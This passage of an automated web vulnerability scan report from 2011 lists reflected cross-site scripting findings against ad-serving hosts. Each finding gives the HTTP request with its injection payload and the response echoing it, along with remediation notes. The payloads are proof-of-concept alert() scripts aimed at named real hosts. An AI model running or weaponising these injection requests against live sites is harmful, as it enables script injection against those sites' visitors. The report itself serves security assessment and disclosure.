Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; mmpg=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 113
Date: Mon, 14 Feb 2011 01:37:38 GMT
Connection: close
Vary: Accept-Encoding

unknown path /ada3b2a<script>alert(1)</script>2a020577f18/cm.dailymail/ron_052010;cmw=nurl;sz=300x250;ord=3461791

3.2. http://a.collective-media.net/ad/cm.drudgerep/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/cm.drudgerep/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 91f06<script>alert(1)</script>bbd480d1b59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad91f06<script>alert(1)</script>bbd480d1b59/cm.drudgerep/;sz=300x250;click0=;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 115
Date: Mon, 14 Feb 2011 02:10:23 GMT
Connection: close
Vary: Accept-Encoding

unknown path /ad91f06<script>alert(1)</script>bbd480d1b59/cm.drudgerep/;cmw=nurl;sz=300x250;click0=;ord=[timestamp]

3.3. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dc11'-alert(1)-'c06cd63375f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.dailymail2dc11'-alert(1)-'c06cd63375f/ron_052010;sz=300x250;ord=3412338? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Date: Mon, 14 Feb 2011 01:35:24 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:24 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail2dc11'-alert(1)-'c06cd63375f/ron_052010;sz=300x250;net=cm;ord=3412338;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.4. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6de2b'-alert(1)-'8f8feffd6d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.dailymail/ron_0520106de2b'-alert(1)-'8f8feffd6d6;sz=300x250;ord=3412338? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Date: Mon, 14 Feb 2011 01:35:25 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:25 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail/ron_0520106de2b'-alert(1)-'8f8feffd6d6;sz=300x250;net=cm;ord=3412338;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.5. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e360'-alert(1)-'b71794fc123 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.dailymail/ron_052010;sz=300x250;ord=3412338?&9e360'-alert(1)-'b71794fc123=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Date: Mon, 14 Feb 2011 01:35:24 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:24 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail/ron_052010;sz=300x250;net=cm;ord=3412338?&9e360'-alert(1)-'b71794fc123=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.6. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7086'-alert(1)-'ae7eaada4f3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.dailymail/ron_052010;sz=300x250;ord=3412338?d7086'-alert(1)-'ae7eaada4f3 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Date: Mon, 14 Feb 2011 01:35:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:23 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail/ron_052010;sz=300x250;net=cm;ord=3412338?d7086'-alert(1)-'ae7eaada4f3;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.7. http://a.collective-media.net/adj/cm.drudgerep/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.drudgerep/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22425'-alert(1)-'80a6204c2ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.drudgerep22425'-alert(1)-'80a6204c2ff/;sz=300x250;click0=;ord=$cacheBuster$ HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Mon, 14 Feb 2011 02:10:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 02:10:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.drudgerep22425'-alert(1)-'80a6204c2ff/;sz=300x250;net=cm;ord=$cacheBuster$;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.8. http://a.collective-media.net/adj/cm.drudgerep/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.drudgerep/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4b37'-alert(1)-'600aca90b1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.drudgerep/;sz=300x250;click0=;ord=$cacheBuster$&d4b37'-alert(1)-'600aca90b1e=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Mon, 14 Feb 2011 02:10:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 02:10:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.drudgerep/;sz=300x250;net=cm;ord=$cacheBuster$&d4b37'-alert(1)-'600aca90b1e=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.9. http://a.collective-media.net/adj/cm.drudgerep/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.drudgerep/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b527'-alert(1)-'c296858d3f2 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.drudgerep/;sz=300x250;click0=;ord=$cacheBuster$1b527'-alert(1)-'c296858d3f2 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Mon, 14 Feb 2011 02:10:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 02:10:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.drudgerep/;sz=300x250;net=cm;ord=$cacheBuster$1b527'-alert(1)-'c296858d3f2;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.10. http://a.rfihub.com/sed [pa parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /sed

Issue detail

The value of the pa request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7e6c4'><script>alert(1)</script>cd7c8900c9b was submitted in the pa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre6473367353167e6c4'><script>alert(1)</script>cd7c8900c9b&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a1=1CAESEDwKxKPrWufjyLofYqzf4_4; t=1296740537347; a=c369013694478760033; o=1-BjMxrfcI6jt9; r=1296740536014; k="aAJBlvOUA==AGnmc809AN1288024309000AAABLgCILYI=AGnmc801AN1288021692000AAABLgCILYI=AGnmc829AN1288026445000AAABLgCILYI=AGnmc736AN1288018708000AAABLgCILYI=AGnmc805AN1288021876000AAABLgCILYI=AGnmc825AN1288026116000AAABLgCILYI=AGnmc773AN1288019600000AAABLgCILYI=AGnmc747AN1288024980000AAABLgCILYI=AGnmc748AN1288024901000AAABLgCILYI="; s="aAE-DNNhg==AE9479AN1294103956000AAABLgq3o_Y=AF12446AN1285279980000AAABLgq3o_Y=AE9438AN1273618082000AAABLgBpdhw=AE8438AN1275963655000AAABLgBpdhw="; b="aAMN9qejw==AD741AAABLgrfWIY=AD793AAABLgrfWIY=AD809AAABLgrfWIY=AD825AAABLgrfWIY=AD736AAABLgrfWIY=AD781AAABLgrfWIY=AD829AAABLgrfWIY=AD748AAABLgrfWIY=AD801AAABLgrfWIY=AD773AAABLgrfWIY=AD747AAABLgrfWIY=AD805AAABLgBphCs="; m="aAGRcyqzg==AI20472726AAABLgrfWIc=AI20472726AAABLgrTunc=AI20472726AAABLgq3K4s=AI20472726AAABLgBphCw=AI20472701AAABLffM4Y0=AI20472701AAABLevCTs8="; g="aAG9rzUwA==A_aBXkOpUe5j7vA|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsS7_s=A_akezhu0C40Skt|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsSR2I=A_a2pwDXuoO-PeR|15705|73433|68086|14121|1243|92574|445|32521|7792AAABLgq3o_o=A_a9RXWgJTWnNNS|14969|69553|60848|13007|1144|90136|306|32226|7317AAABLgCILYY=A_aFWCVjo6agoYc|16569|76934|70571|14534|1277|92574|445|32490|7755AAABLgBpfaE=A9aTqK7H67WacJ_|9542|45408|51494|13737|830|92405|445|29513|7557AAABLgBpdh8="; c="aAh4fa6Qg==AFd1243AB3AAABLhsS7_c=AFv2946AB3AAABLhsS7_c=AGu14941AB3AAABLhsS7_c=AFc1243AB3AAABLhsS7_c=AFl2946AB3AAABLhsS7_c=AGt14941AB3AAABLhsS7_c=AGb15706AB2AAABLhsS7_c=AGa15706AB2AAABLhsS7_c=AGb15705AB1AAABLgq3o_Y=AGa15705AB1AAABLgq3o_Y=AFd1144AB1AAABLgCILYI=AFv2383AB1AAABLgCILYI=AGu11341AB1AAABLgCILYI=AFc1144AB1AAABLgCILYI=AFl2383AB1AAABLgCILYI=AGb14969AB1AAABLgCILYI=AGa14969AB1AAABLgCILYI=AFd1277AB1AAABLgBpfZ4=AFv3000AB1AAABLgBpfZ4=AGu15506AB1AAABLgBpfZ4=AFc1277AB1AAABLgBpfZ4=AFl3000AB1AAABLgBpfZ4=AGt15506AB1AAABLgBpfZ4=AGb16569AB1AAABLgBpfZ4=AGa16569AB1AAABLgBpfZ4=AEd830AB1AAABLgBpdhw=AFv1265AB1AAABLgBpdhw=AFu5385AB1AAABLgBpdhw=AEc830AB1AAABLgBpdhw=AFl1265AB1AAABLgBpdhw=AFt5385AB1AAABLgBpdhw=AFb9542AB1AAABLgBpdhw=AFa9542AB1AAABLgBpdhw="; f="aAFSdsTtQ==AK1297534306AB2AAABLhsS7_c=AK1297259930AB2AAABLgrfWIY=AK1297087034AB4AAABLgCILYI=AK1296942555AB1AAABLffM4Y0=AK1296740536AB1AAABLevCTs4="; e=cd

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: g="aAHN7Dy1Q==A_ax3hqHhIaQ7kH|15705|73433|68086|14121|1243|92574|445|32981|7792AAABLiHOrUw=A_aBXkOpUe5j7vA|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsS7_s=A_akezhu0C40Skt|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsSR2I=A_a2pwDXuoO-PeR|15705|73433|68086|14121|1243|92574|445|32521|7792AAABLgq3o_o=A_a9RXWgJTWnNNS|14969|69553|60848|13007|1144|90136|306|32226|7317AAABLgCILYY=A_aFWCVjo6agoYc|16569|76934|70571|14534|1277|92574|445|32490|7755AAABLgBpfaE=A9aTqK7H67WacJ_|9542|45408|51494|13737|830|92405|445|29513|7557AAABLgBpdh8=";Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Set-Cookie: c="aAh0Fw84g==AFd1243AB4AAABLiHOrUg=AFv2946AB4AAABLiHOrUg=AGu14941AB4AAABLiHOrUg=AFc1243AB4AAABLiHOrUg=AFl2946AB4AAABLiHOrUg=AGt14941AB4AAABLiHOrUg=AGb15705AB2AAABLiHOrUg=AGa15705AB2AAABLiHOrUg=AGb15706AB2AAABLhsS7_c=AGa15706AB2AAABLhsS7_c=AFd1144AB1AAABLgCILYI=AFv2383AB1AAABLgCILYI=AGu11341AB1AAABLgCILYI=AFc1144AB1AAABLgCILYI=AFl2383AB1AAABLgCILYI=AGb14969AB1AAABLgCILYI=AGa14969AB1AAABLgCILYI=AFd1277AB1AAABLgBpfZ4=AFv3000AB1AAABLgBpfZ4=AGu15506AB1AAABLgBpfZ4=AFc1277AB1AAABLgBpfZ4=AFl3000AB1AAABLgBpfZ4=AGt15506AB1AAABLgBpfZ4=AGb16569AB1AAABLgBpfZ4=AGa16569AB1AAABLgBpfZ4=AEd830AB1AAABLgBpdhw=AFv1265AB1AAABLgBpdhw=AFu5385AB1AAABLgBpdhw=AEc830AB1AAABLgBpdhw=AFl1265AB1AAABLgBpdhw=AFt5385AB1AAABLgBpdhw=AFb9542AB1AAABLgBpdhw=AFa9542AB1AAABLgBpdhw=";Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Set-Cookie: f="aAGmgjuLw==AK1297647316AB1AAABLiHOrUg=AK1297534306AB2AAABLhsS7_c=AK1297259930AB2AAABLgrfWIY=AK1297087034AB4AAABLgCILYI=AK1296942555AB1AAABLffM4Y0=AK1296740536AB1AAABLevCTs4=";Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Set-Cookie: e=cb;Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Content-Length: 2175

<html><body><span id="__rfi" style="height:0px; width:0px"><IFRAME SRC="http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647316296;click=http://a.rfihub.com/aci
...[SNIP]...
border=0 width=0 height=0 src='http://a.rfihub.com/tk.gif?rb=445&re=19969&aa=15705,73433,14121,68086,1243,14941,x3hqHhIaQ7kH,http%3A%2F%2Frocketfuelinc.com,776,2946,32981,1879,7792&pa=ppre6473367353167e6c4'><script>alert(1)</script>cd7c8900c9b&id=&ra=6473163000.11331372547018437'>
...[SNIP]...

3.11. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5123509.61

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc59a"-alert(1)-"ed8a505e8a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5&dc59a"-alert(1)-"ed8a505e8a7=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
